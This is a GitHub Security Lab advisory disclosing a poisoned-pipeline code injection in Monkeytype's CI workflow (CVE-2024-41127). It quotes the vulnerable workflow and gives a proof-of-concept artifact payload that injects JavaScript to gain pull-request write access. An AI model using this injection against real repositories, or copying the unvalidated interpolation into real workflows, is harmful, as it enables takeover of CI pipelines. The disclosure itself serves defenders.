GHSL-2024-167: Poisoned Pipeline Execution through Code Injection in Monkeytype - CVE-2024-41127

Coordinated Disclosure Timeline

• 2024-07-17: Reported through GitHub’s Private Vulnerability Reporting (PVR).
• 2024-07-20: Fixed by PR.

Summary

Monkeytype is vulnerable to Poisoned Pipeline Execution through Code Injection in its ci-failure-comment.yml GitHub Workflow, enabling attackers to gain pull-requests write access.

Project

monkeytype

Tested Version

Latest commit at the time of reporting

Details

Code Injection in ci-failure-comment.yml (GHSL-2024-167)

The ci-failure-comment.yml workflow is triggered when the Monkey CI workflow completes:

on:
  workflow_run:
    workflows: [Monkey CI]
    types: [completed]

When it runs, it will download an artifact uploaded by the triggering workflow and assign the contents of ./pr_num/pr_num.txt artifact to the steps.pr_num_reader.outputs.content WorkFlow variable:

- name: Download workflow artifact
  uses: dawidd6/action-download-artifact@v2.11.0
  with:
    github_token: ${{ secrets.GITHUB_TOKEN }}
    workflow: peek_icons.yml
    run_id: ${{ github.event.workflow_run.id }}

- name: Read the pr_num file
  id: pr_num_reader
  uses: juliangruber/read-file-action@v1.0.0
  with:
    path: ./pr_num/pr_num.txt

It is not validated that the variable is actually a number and later it is interpolated into a JS script allowing an attacker to change the code to be executed:

- name: Create comment
  uses: actions/github-script@v6
  with:
    github-token: ${{ secrets.API_TOKEN }}
    script: |
      github.rest.issues.createComment({
        issue_number: ${{ steps.pr_num_reader.outputs.content }},
        owner: context.repo.owner,
        repo: context.repo.repo,
         body: 'Continuous integration check(s) failed. Please review the failing check\'s logs and make the necessary changes. ' + context.payload.workflow_run.html_url
      })

Proof Of Concept

• Fork the repo.
• Create a new branch.
• Modify the contents of .github/workflows/monkey-ci.yml to:

name: Monkey CI

on:
  pull_request:

jobs:
  exploit:
    permissions: write-all
    runs-on: ubuntu-latest
    steps:
      - name: Write exploit to artifact
        shell: bash
        run: echo '`${console.log('PWNED')}`' > pr_num.txt

      - name: Upload the exploit
        uses: actions/upload-artifact@v3
        with:
          name: pr_num
          path: ./pr_num.txt

• Create a Pull request with this change to the master branch of monkeytype.
• The modified workflow will trigger and will upload an artifact with the exploit which will trigger the second workflow which will download it and interpolate it into the JS script.

Impact

This issue leads to pull-requests write access.

Resources

• CodeQL for JavaScript - Expression injection in Actions
• Keeping your GitHub Actions and workflows secure Part 2: Untrusted input
• Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests

CVE

• CVE-2024-41127

Resources

• https://github.com/monkeytypegame/monkeytype/security/advisories/GHSA-wcjf-5464-4wq9

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-167 in any communication regarding this issue.